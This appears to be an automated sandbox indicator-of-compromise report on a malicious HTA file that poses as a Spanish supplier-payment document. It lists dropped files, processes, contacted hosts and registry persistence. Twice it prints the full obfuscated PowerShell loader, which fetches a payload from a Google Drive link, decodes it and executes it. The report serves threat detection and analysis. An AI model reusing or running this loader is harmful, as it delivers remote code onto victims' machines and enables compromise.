IOC Report
Gesti#U00f3n Pago a Proveedores - Liquidaci#U00f3n anticipo.hta

loading gif

Files

File Path
Type
Category
Malicious
Gesti#U00f3n Pago a Proveedores - Liquidaci#U00f3n anticipo.hta
HTML document, ASCII text, with very long lines (364), with CRLF line terminators
initial sample
malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0x8462f1e3, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3jpymj1w.0sy.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dzjwkmwf.lle.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uli50ha0.qs2.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yymccahe.shb.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Lactoscope.cla
ASCII text, with very long lines (65536), with no line terminators
dropped
C:\Users\user\AppData\Roaming\newfile\newfile.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
There are 3 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\SysWOW64\mshta.exe
mshta.exe "C:\Users\user\Desktop\Gesti#U00f3n Pago a Proveedores - Liquidaci#U00f3n anticipo.hta"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Nasolacrimal = 1;$Crummies182='Substrin';$Crummies182+='g';Function Nejsigerens($Paynize){$Respirator=$Paynize.Length-$Nasolacrimal;For($bolsjes=5; $bolsjes -lt $Respirator; $bolsjes+=(6)){$Velmagtstid+=$Paynize.$Crummies182.Invoke($bolsjes, $Nasolacrimal);}$Velmagtstid;}function Vinddrejning($Brinken){. ($Findelings) ($Brinken);}$Sedimentet=Nejsigerens ',hoppMSil.no SkakzSlleriAkkorlHeterlSyncha.ylte/Gardi5 Ympe.Smlst0 Nei Fabel(RomanWSeed.iBed nnPost.dTilhyoTj.new tirrsMod.g PartNaadseTPaali Haf,a1Indru0P,gme.Prjud0 o,ni;Glamo NonpaWBromii SlaunAstra6P.ene4Desmo;Chous gitax T,ne6Angst4Engin;Calyp SubdorLavniv Farv:Nyrel1Rival2Tempo1Faste.Senge0Reo.t)Skamf TricG P oteunl,ccGr ymkGlo eo aute/ .ata2Ca er0thuj 1S.erl0 Beds0Betin1Tete,0Rearr1Typis OstraFsaginiR,ndsrChrone RetsfB,natoI scux B.nd/Bogti1Alter2 A,lu1Svell.,avpr0Brode ';$Accouplement=Nejsigerens 'CrotoUtravasNebuleRetslrPe ta-VinylA,oblegOpstieNonbinKokketOvers ';$Chorioretinal=Nejsigerens ' Top,hGuaratSoliftXosavpBen is flyv:Podni/Jer s/cl padwolfgr K.miiAfglavgreeneBev,l. ScabgPrea oMicroo irayg PyrolHa,moe,ista.HighecHund.oscro,mSpir./MachiuMydricEvenn?Rain.eParcax ,edipgrumboPro,rrNgleftCh,ly= CottdHuntso Eftew TilbnFeutelHom,woPositaLoquadCarac&Plag iEpicudFoste=Possi1 UndeiXenylLSjklefBeman5MyelobRegioI Y gipDefalyKonges Rackm Ef eyBlrehGGemmadKompaUNo,nysUnseet SiakyUan,d6defauc,ueriSErgat9NonfouMe ioMTeatey.ogstD,atklkAlu,aTDecelZ OzelrMirabnsnuffvcongeH opsk ';$Roselil=Nejsigerens 'Forle>Geoge ';$Findelings=Nejsigerens ' Polli SvineFor,lxKoron ';$Forslvende='Tarnishable';Vinddrejning (Nejsigerens 'Vrd.pSPhilaeByr.ttRe to-DigesCStilloTgtgenErholtDoddieWindln,andotSu.er tirz-Pol,lP un ea BegrtredirhYderz SubmaT.oral: omer\at.enT MyceeTryllrNyanjzUs nse Fungt EpidtObligoTrykf.R.flhtSt.afxF.agttConce itr-LuskeVRakkeaWrybilS.eenuAfgife Jell Gunya$ Go,aFMegavoAutomrAtropsSulfolClotsvW.ttieCraninHyperdPolyreAf gt;Rorpi ');Vinddrejning (Nejsigerens 'Udb ki Gennf Medi hefti(TeksttRetypeKni.ssWolfetS lfi-MicropId,liaForbrtpsychhMilea C.onTo,tol:Valut\ErhveTCityee MaizrU.uelzLovfoe Ph etHandetbaksnoSavor.VisiotTessax supetLuf,v)kalci{Hermge OmkoxF rniiPhrentDisk }Discu;Uhums ');$gedde = Nejsigerens 'brneheA,rstcBrunehPaaseoSindb P.rfo%Ge neaArmhup M,slpHivoldprospapontitDiletaFr,ng%Palar\ShogaLSkrupaL,ceicE,imet V.dnoOph hsAdmincEr.opoUnderpLe.ioeIslnd.heikacSubcllL vneahomog Dkket&Skjol& Mali Kvi.detro icEnasbhArchdoOb,as Recre$ Spin ';Vinddrejning (Nejsigerens 'Bolde$ atig .kumlCelluoPost.b FoliaFjolslAphan:DroplCStru,aThemedBemurevicilaTeleou,remfeUnponrDo,ma=Infic(L.tryclrredmAbrfod,ohor Mcca/Prludc Taur Ratg$.iceugFlandeTopmedTvededMisfoeSelve)T ril ');Vinddrejning (Nejsigerens ' Stre$ T,llgPyogelquinqoAsyndb orta ompalTr.ns:BlemmAO shadDet im.ybloiAnit n Scowi lossFanattAzotorGa.isaOrni,tMentoiScrumoVe.stnFishssZaca.g sortrHermauWe,rynProcrdStrmklsplenaToretg,palieLlenmnSad seReymo=Geno.$Ba.baChardshInteroHematrSubthi Uno oNeu rr I,paeBokeftFestoiEthyln Joura Gre lSamt,.PicarsIndpapJungplBen eiTernetHjt a(Tando$TransRUnparoDisposPhysoeInterlscl riPectolShims)Absal ');$Chorioretinal=$Administrationsgrundlagene[0];Vinddrejning (Nejsigerens 'Kapit$Turn g bl.mlPre.eoUn ebbP,inkastatel Unsy:FirehSGlds,aDe,aunVriddeLanchrExtraiBonkanknevlgNatursBill pKompelBundlaMesennVommeeLand.rcaptanCi rieoverg=Dr coNLighteKlammw boid- FeriOSammeb Respj Evine Pu,sc euphtDans B vbnS PresyRi.orsFort.t,tlasenephem.imch.DigalNCattleUopfotOply..Ego iWH lsteCertibrbestCL vgilFraskiMisaweCtenonRecipt pseu ');Vinddrejning (Nejsigerens 'Non e$SkindSParacaSer nnGudsdeMagisrSubpoiAreoln vendgCongos Inclp Exhal,ehelaS,irinArisaeStilfrBubblnOpsvueGenne.ForfiHsequee,odsiaFo.jad M,dve M,farBil is.arou[Unhon$V preAEquincLavricUdhunoAcma uAfklipInd.bl tufe TracmCalcue Re tnUdviktDoven]Outcu=Hydr,$SalsoSHa dee illwdgr.deiOveremStok,eTherinHocust ordpe.uthytU val ');$Udgangsstrm250=Nejsigerens 'MaryaSOverfa OptonTulipeHe.herEnergi cattn ConfgReaccsLeatmpSkammlkrvelaetelcnCoveneRocksrE,hnonShoole,reva.BindhDSt.teoO svbwFartsnfjernlNe,orounfaba,otundPan cF,romaiHurrolKrit eBlank(Buest$CulpaCApochh,agsdoFarverEnhydiMa,tioUngagrShabreredeltStimaiHassen bukka M.dnlAma t,.phol$Spli C AfskoBe,ttc StrekPaaref,alloisulphg TnkehUndert.estriStartnHeathg Rodo) ,ndh ';$Udgangsstrm250=$Cadeauer[1]+$Udgangsstrm250;$Cockfighting=$Cadeauer[0];Vinddrejning (Nejsigerens 'Sondr$SpraigUpgirlFod,ro MiddbMonocaU ganl,idst:PressTRomani FremlSikkefM.stmr afbaeopsnad OdonsUnderhb ssie lycedF,ikieFre.vrDdskrnVentreTaaresStudi=Stikb( emhuTNabobeBlaals Mid tDep,r- HypePRejeraMeedltSubpahKuvse ,nstr$SpidsCS,mmeoGeyercBuzzikNetvrf ChariTilf.g Byrah OdestLikvii VerbnBackwgRnneb)Dilan ');while (!$Tilfredshedernes) {Vinddrejning (Nejsigerens 'Deepf$UndergUnscal Bseso,yperb VigeaSof wlLav n:EsbjeUReflenForn.dAestueDodecr.pokefSirtsuUnm,tlGennedOrthotApusp= Tare$Preapt ReecrSwelpu Boa.eFragr ') ;Vinddrejning $Udgangsstrm250;Vinddrejning (Nejsigerens 'YauldSMaxyut,taova ShahrHippotSk ep-,nsigSnatiolAsthmeStjfrePirnapFante Tredj4Pir.e ');Vinddrejning (Nejsigerens 'Misco$ForedgrdliglP,rcho C,nvbBysv,aSeleklEf.er:Sag,eTPle.iiCo,stlYapnefTe nirSkak,eHangadPsorisFalsihCentreWinkld Perce Skobr HowenBegroeornitsK,der=Holde(Bat.rT Pi oeFo.rissejertLa.rs-I.surPDi,feaHarqutPyre.hDacke Priva$Un,veC Trb.oVerdecCorevkD,lemf LageiBe,mtg SaddhSlyngtHydroiHaandn Litug Tyf,)Un us ') ;Vinddrejning (Nejsigerens 'Deant$IonizgLemlslMahogo KommbHex.ca Preal Myre:Forb.AA pecg b.artSupereRecoprKh ziiRosennA aled Co,k= Prfe$MisvigTocyllEmpi oPompsbBrofoa Ma.ilBounc:EpalebPoes eExo irWrenciSk ttgCanoneKonebrRetou+Kokon+Nonil%Besky$,ksisA Fretdraad,mSamariPreamnVilloi,ndsts.ryset Aetor VildaAmycltF.ndeiAtomloFrdignatamas P rsg PladrEuropuKorrenHulladAfstelPhospa .ymbgS,ende aspanexpere Hydr.ReinccNeocooBesmou P.trnExcomtFldef ') ;$Chorioretinal=$Administrationsgrundlagene[$Agterind];}Vinddrejning (Nejsigerens ' K,ag$at.mag Sjofl PersoE pirbVidnea Pulil Meta:PenteRpaletoandeliTvetus Br.ut StareA.roer,raadsAsthm Intra= .nir Cr,ptGPap.le Nondt Prom-.nterCConfro RutenU,trytFjante UnmonDivert A.en Lrerr$ Cen,CDr,kno,knhec,enezkUnd rfRentaiRegnegs.ralhUdlantSpad,iRhinsnTopvigEbo,s ');Vinddrejning (Nejsigerens 'Pois $.entigUndaml H,ppo Cr,sbduaneasystelTermi:raa aURaketnInge.hBairna .piprKldedmFagalfTaageuSeniolOstrilExhibysvali Velsi=Under Xanth[to.deSCytoly KrabsForcet Eksie UnidmPlatf.lykkeCS kuloFinann Nonfv preaeBloter AnimtMarti] ,ntg:Acant:Arb,jFSo.iorG,baroNe,stm FortBSandwaIndets GifteBorte6 Stvb4BarnaS R,ngtRander R,tii .undnAffalg oug(Tonef$Sk wsRInexpoGrundi Pu.dsBarbatHjemmeAg,larLektis .edt)Gardi ');Vinddrejning (Nejsigerens 'Apish$DermogRemedlGreeko,isjobMismoa.ynodlBiolo:Harpek BollojodtifOphidfPippieCalumrSkam,d CrimaAquarmAg,oss Tilf ,ity=Releg Cresc[B.arbS Aftey InspsBrandtPatruePleurmBeski.BjergTRyddeeoriolx.ortftStr,e.UperiE KrybnEarricsartioDd.stdOutsliGalganelektgKera.]Pelti:semiv:udtryA DuodS .ettCUsa,aITipvoIFordy.UnhouGHunkneTo.tftM.tchSAbsintNon irVermii,arginChansg.jenl(Ball,$SexolU,orhanTubulhSyle aTenotrFortomMur,rfUn aru StralSelv,lDistry Muil)Husst ');Vinddrejning (Nejsigerens 'Latyr$B dcygArri lPolyboZooglbS raaa.ljfnlIrr s:UngnaCHjertiBurkisHenvicLed loCharteSma.tsTh.ot=Serve$ SplakFris.oRandifRakkefDr nceSvendrKlassdreforaRibbimMoists,enyt.ForresKomb u uninbMinhasChayotKolonrDat liBarbenIntimgdet,s(Pleur2ep.pg9Simul8Nonco9 Ufre6 Hype4Prod,,i ter2 tepd9Firdo3Bemal6Seric6Tekst) Koto ');Vinddrejning $Ciscoes;"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Nasolacrimal = 1;$Crummies182='Substrin';$Crummies182+='g';Function Nejsigerens($Paynize){$Respirator=$Paynize.Length-$Nasolacrimal;For($bolsjes=5; $bolsjes -lt $Respirator; $bolsjes+=(6)){$Velmagtstid+=$Paynize.$Crummies182.Invoke($bolsjes, $Nasolacrimal);}$Velmagtstid;}function Vinddrejning($Brinken){. ($Findelings) ($Brinken);}$Sedimentet=Nejsigerens ',hoppMSil.no SkakzSlleriAkkorlHeterlSyncha.ylte/Gardi5 Ympe.Smlst0 Nei Fabel(RomanWSeed.iBed nnPost.dTilhyoTj.new tirrsMod.g PartNaadseTPaali Haf,a1Indru0P,gme.Prjud0 o,ni;Glamo NonpaWBromii SlaunAstra6P.ene4Desmo;Chous gitax T,ne6Angst4Engin;Calyp SubdorLavniv Farv:Nyrel1Rival2Tempo1Faste.Senge0Reo.t)Skamf TricG P oteunl,ccGr ymkGlo eo aute/ .ata2Ca er0thuj 1S.erl0 Beds0Betin1Tete,0Rearr1Typis OstraFsaginiR,ndsrChrone RetsfB,natoI scux B.nd/Bogti1Alter2 A,lu1Svell.,avpr0Brode ';$Accouplement=Nejsigerens 'CrotoUtravasNebuleRetslrPe ta-VinylA,oblegOpstieNonbinKokketOvers ';$Chorioretinal=Nejsigerens ' Top,hGuaratSoliftXosavpBen is flyv:Podni/Jer s/cl padwolfgr K.miiAfglavgreeneBev,l. ScabgPrea oMicroo irayg PyrolHa,moe,ista.HighecHund.oscro,mSpir./MachiuMydricEvenn?Rain.eParcax ,edipgrumboPro,rrNgleftCh,ly= CottdHuntso Eftew TilbnFeutelHom,woPositaLoquadCarac&Plag iEpicudFoste=Possi1 UndeiXenylLSjklefBeman5MyelobRegioI Y gipDefalyKonges Rackm Ef eyBlrehGGemmadKompaUNo,nysUnseet SiakyUan,d6defauc,ueriSErgat9NonfouMe ioMTeatey.ogstD,atklkAlu,aTDecelZ OzelrMirabnsnuffvcongeH opsk ';$Roselil=Nejsigerens 'Forle>Geoge ';$Findelings=Nejsigerens ' Polli SvineFor,lxKoron ';$Forslvende='Tarnishable';Vinddrejning (Nejsigerens 'Vrd.pSPhilaeByr.ttRe to-DigesCStilloTgtgenErholtDoddieWindln,andotSu.er tirz-Pol,lP un ea BegrtredirhYderz SubmaT.oral: omer\at.enT MyceeTryllrNyanjzUs nse Fungt EpidtObligoTrykf.R.flhtSt.afxF.agttConce itr-LuskeVRakkeaWrybilS.eenuAfgife Jell Gunya$ Go,aFMegavoAutomrAtropsSulfolClotsvW.ttieCraninHyperdPolyreAf gt;Rorpi ');Vinddrejning (Nejsigerens 'Udb ki Gennf Medi hefti(TeksttRetypeKni.ssWolfetS lfi-MicropId,liaForbrtpsychhMilea C.onTo,tol:Valut\ErhveTCityee MaizrU.uelzLovfoe Ph etHandetbaksnoSavor.VisiotTessax supetLuf,v)kalci{Hermge OmkoxF rniiPhrentDisk }Discu;Uhums ');$gedde = Nejsigerens 'brneheA,rstcBrunehPaaseoSindb P.rfo%Ge neaArmhup M,slpHivoldprospapontitDiletaFr,ng%Palar\ShogaLSkrupaL,ceicE,imet V.dnoOph hsAdmincEr.opoUnderpLe.ioeIslnd.heikacSubcllL vneahomog Dkket&Skjol& Mali Kvi.detro icEnasbhArchdoOb,as Recre$ Spin ';Vinddrejning (Nejsigerens 'Bolde$ atig .kumlCelluoPost.b FoliaFjolslAphan:DroplCStru,aThemedBemurevicilaTeleou,remfeUnponrDo,ma=Infic(L.tryclrredmAbrfod,ohor Mcca/Prludc Taur Ratg$.iceugFlandeTopmedTvededMisfoeSelve)T ril ');Vinddrejning (Nejsigerens ' Stre$ T,llgPyogelquinqoAsyndb orta ompalTr.ns:BlemmAO shadDet im.ybloiAnit n Scowi lossFanattAzotorGa.isaOrni,tMentoiScrumoVe.stnFishssZaca.g sortrHermauWe,rynProcrdStrmklsplenaToretg,palieLlenmnSad seReymo=Geno.$Ba.baChardshInteroHematrSubthi Uno oNeu rr I,paeBokeftFestoiEthyln Joura Gre lSamt,.PicarsIndpapJungplBen eiTernetHjt a(Tando$TransRUnparoDisposPhysoeInterlscl riPectolShims)Absal ');$Chorioretinal=$Administrationsgrundlagene[0];Vinddrejning (Nejsigerens 'Kapit$Turn g bl.mlPre.eoUn ebbP,inkastatel Unsy:FirehSGlds,aDe,aunVriddeLanchrExtraiBonkanknevlgNatursBill pKompelBundlaMesennVommeeLand.rcaptanCi rieoverg=Dr coNLighteKlammw boid- FeriOSammeb Respj Evine Pu,sc euphtDans B vbnS PresyRi.orsFort.t,tlasenephem.imch.DigalNCattleUopfotOply..Ego iWH lsteCertibrbestCL vgilFraskiMisaweCtenonRecipt pseu ');Vinddrejning (Nejsigerens 'Non e$SkindSParacaSer nnGudsdeMagisrSubpoiAreoln vendgCongos Inclp Exhal,ehelaS,irinArisaeStilfrBubblnOpsvueGenne.ForfiHsequee,odsiaFo.jad M,dve M,farBil is.arou[Unhon$V preAEquincLavricUdhunoAcma uAfklipInd.bl tufe TracmCalcue Re tnUdviktDoven]Outcu=Hydr,$SalsoSHa dee illwdgr.deiOveremStok,eTherinHocust ordpe.uthytU val ');$Udgangsstrm250=Nejsigerens 'MaryaSOverfa OptonTulipeHe.herEnergi cattn ConfgReaccsLeatmpSkammlkrvelaetelcnCoveneRocksrE,hnonShoole,reva.BindhDSt.teoO svbwFartsnfjernlNe,orounfaba,otundPan cF,romaiHurrolKrit eBlank(Buest$CulpaCApochh,agsdoFarverEnhydiMa,tioUngagrShabreredeltStimaiHassen bukka M.dnlAma t,.phol$Spli C AfskoBe,ttc StrekPaaref,alloisulphg TnkehUndert.estriStartnHeathg Rodo) ,ndh ';$Udgangsstrm250=$Cadeauer[1]+$Udgangsstrm250;$Cockfighting=$Cadeauer[0];Vinddrejning (Nejsigerens 'Sondr$SpraigUpgirlFod,ro MiddbMonocaU ganl,idst:PressTRomani FremlSikkefM.stmr afbaeopsnad OdonsUnderhb ssie lycedF,ikieFre.vrDdskrnVentreTaaresStudi=Stikb( emhuTNabobeBlaals Mid tDep,r- HypePRejeraMeedltSubpahKuvse ,nstr$SpidsCS,mmeoGeyercBuzzikNetvrf ChariTilf.g Byrah OdestLikvii VerbnBackwgRnneb)Dilan ');while (!$Tilfredshedernes) {Vinddrejning (Nejsigerens 'Deepf$UndergUnscal Bseso,yperb VigeaSof wlLav n:EsbjeUReflenForn.dAestueDodecr.pokefSirtsuUnm,tlGennedOrthotApusp= Tare$Preapt ReecrSwelpu Boa.eFragr ') ;Vinddrejning $Udgangsstrm250;Vinddrejning (Nejsigerens 'YauldSMaxyut,taova ShahrHippotSk ep-,nsigSnatiolAsthmeStjfrePirnapFante Tredj4Pir.e ');Vinddrejning (Nejsigerens 'Misco$ForedgrdliglP,rcho C,nvbBysv,aSeleklEf.er:Sag,eTPle.iiCo,stlYapnefTe nirSkak,eHangadPsorisFalsihCentreWinkld Perce Skobr HowenBegroeornitsK,der=Holde(Bat.rT Pi oeFo.rissejertLa.rs-I.surPDi,feaHarqutPyre.hDacke Priva$Un,veC Trb.oVerdecCorevkD,lemf LageiBe,mtg SaddhSlyngtHydroiHaandn Litug Tyf,)Un us ') ;Vinddrejning (Nejsigerens 'Deant$IonizgLemlslMahogo KommbHex.ca Preal Myre:Forb.AA pecg b.artSupereRecoprKh ziiRosennA aled Co,k= Prfe$MisvigTocyllEmpi oPompsbBrofoa Ma.ilBounc:EpalebPoes eExo irWrenciSk ttgCanoneKonebrRetou+Kokon+Nonil%Besky$,ksisA Fretdraad,mSamariPreamnVilloi,ndsts.ryset Aetor VildaAmycltF.ndeiAtomloFrdignatamas P rsg PladrEuropuKorrenHulladAfstelPhospa .ymbgS,ende aspanexpere Hydr.ReinccNeocooBesmou P.trnExcomtFldef ') ;$Chorioretinal=$Administrationsgrundlagene[$Agterind];}Vinddrejning (Nejsigerens ' K,ag$at.mag Sjofl PersoE pirbVidnea Pulil Meta:PenteRpaletoandeliTvetus Br.ut StareA.roer,raadsAsthm Intra= .nir Cr,ptGPap.le Nondt Prom-.nterCConfro RutenU,trytFjante UnmonDivert A.en Lrerr$ Cen,CDr,kno,knhec,enezkUnd rfRentaiRegnegs.ralhUdlantSpad,iRhinsnTopvigEbo,s ');Vinddrejning (Nejsigerens 'Pois $.entigUndaml H,ppo Cr,sbduaneasystelTermi:raa aURaketnInge.hBairna .piprKldedmFagalfTaageuSeniolOstrilExhibysvali Velsi=Under Xanth[to.deSCytoly KrabsForcet Eksie UnidmPlatf.lykkeCS kuloFinann Nonfv preaeBloter AnimtMarti] ,ntg:Acant:Arb,jFSo.iorG,baroNe,stm FortBSandwaIndets GifteBorte6 Stvb4BarnaS R,ngtRander R,tii .undnAffalg oug(Tonef$Sk wsRInexpoGrundi Pu.dsBarbatHjemmeAg,larLektis .edt)Gardi ');Vinddrejning (Nejsigerens 'Apish$DermogRemedlGreeko,isjobMismoa.ynodlBiolo:Harpek BollojodtifOphidfPippieCalumrSkam,d CrimaAquarmAg,oss Tilf ,ity=Releg Cresc[B.arbS Aftey InspsBrandtPatruePleurmBeski.BjergTRyddeeoriolx.ortftStr,e.UperiE KrybnEarricsartioDd.stdOutsliGalganelektgKera.]Pelti:semiv:udtryA DuodS .ettCUsa,aITipvoIFordy.UnhouGHunkneTo.tftM.tchSAbsintNon irVermii,arginChansg.jenl(Ball,$SexolU,orhanTubulhSyle aTenotrFortomMur,rfUn aru StralSelv,lDistry Muil)Husst ');Vinddrejning (Nejsigerens 'Latyr$B dcygArri lPolyboZooglbS raaa.ljfnlIrr s:UngnaCHjertiBurkisHenvicLed loCharteSma.tsTh.ot=Serve$ SplakFris.oRandifRakkefDr nceSvendrKlassdreforaRibbimMoists,enyt.ForresKomb u uninbMinhasChayotKolonrDat liBarbenIntimgdet,s(Pleur2ep.pg9Simul8Nonco9 Ufre6 Hype4Prod,,i ter2 tepd9Firdo3Bemal6Seric6Tekst) Koto ');Vinddrejning $Ciscoes;"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Users\user\AppData\Roaming\newfile\newfile.exe
"C:\Users\user\AppData\Roaming\newfile\newfile.exe"
malicious
C:\Users\user\AppData\Roaming\newfile\newfile.exe
"C:\Users\user\AppData\Roaming\newfile\newfile.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Lactoscope.cla && echo $"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Lactoscope.cla && echo $"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
There are 1 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
http://nuget.org/NuGet.exe
unknown
http://r3.i.lencr.org/0R
unknown
http://mail.cash4cars.nz
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
http://www.microsoft.co
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
http://crl.ver)
unknown
https://drive.usercontent.google.com/
unknown
https://g.live.com/odclientsettings/ProdV2.C:
unknown
https://drive.google.com//ApU3
unknown
https://github.com/Pester/Pester
unknown
https://www.google.com
unknown
https://g.live.com/odclientsettings/Prod/C:
unknown
https://aka.ms/pscore6lB
unknown
https://drive.google.com/
unknown
http://x1.c.lencr.org/0
unknown
http://x1.i.lencr.org/0
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://ip-api.com
unknown
http://r3.o.lencr.org0
unknown
https://drive.google.com
unknown
https://drive.usercontent.google.com
unknown
https://drive.usercontent.google.com/y
unknown
https://apis.google.com
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://ip-api.com/line/?fields=hosting
208.95.112.1
There are 20 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
mail.cash4cars.nz
114.142.162.17
malicious
drive.google.com
142.250.65.174
drive.usercontent.google.com
142.251.35.161
ip-api.com
208.95.112.1

IPs

IP
Domain
Country
Malicious
114.142.162.17
mail.cash4cars.nz
Australia
malicious
142.251.35.161
drive.usercontent.google.com
United States
208.95.112.1
ip-api.com
United States
142.250.65.174
drive.google.com
United States
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
newfile
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\Explorer.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\Explorer.exe.ApplicationCompany
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
Zvpebfbsg.Jvaqbjf.Rkcybere
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
HRZR_PGYFRFFVBA
